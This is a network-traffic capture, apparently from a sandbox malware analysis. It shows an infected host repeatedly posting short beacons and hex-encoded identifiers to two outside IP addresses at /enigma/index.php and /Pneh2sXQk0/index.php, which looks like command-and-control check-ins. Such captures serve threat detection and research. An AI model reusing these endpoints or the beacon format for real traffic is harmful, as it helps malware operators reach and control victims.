Apr 19, 2024 03:35:25.908648014 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:26.150096893 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1188192.168.2.551042193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:26.403111935 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:26.651443958 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1189192.168.2.551043193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:26.404217005 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:26.657813072 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1190192.168.2.551044193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:26.897315979 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:27.143723965 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1191192.168.2.551045193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:27.026458025 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:27.274076939 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1192192.168.2.551046193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:27.489200115 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:27.734047890 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1193192.168.2.551047193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:27.525182962 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:27.778274059 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1194 | 192.168.2.5 | 51048 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:27.984570026 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:28.232873917 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1195 | 192.168.2.5 | 51049 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:28.139039993 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:28.387048960 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1196 | 192.168.2.5 | 51050 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:28.587800026 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:28.834525108 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1197 | 192.168.2.5 | 51051 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:28.639159918 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:28.891321898 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1198 | 192.168.2.5 | 51052 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:29.090085983 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:29.343575954 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1199 | 192.168.2.5 | 51053 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:29.242252111 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:29.488976955 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1200 | 192.168.2.5 | 51054 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:29.694365978 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:29.938884020 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1201 | 192.168.2.5 | 51055 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:29.747419119 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:30.004163027 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1202 | 192.168.2.5 | 51056 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:30.191020012 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:30.443958998 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1203 | 192.168.2.5 | 51057 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:30.367753983 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:30.611819983 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1204 | 192.168.2.5 | 51058 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:30.804811954 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:31.050292015 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1205 | 192.168.2.5 | 51059 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:30.856894970 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:31.101797104 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1206 | 192.168.2.5 | 51060 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:31.298693895 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
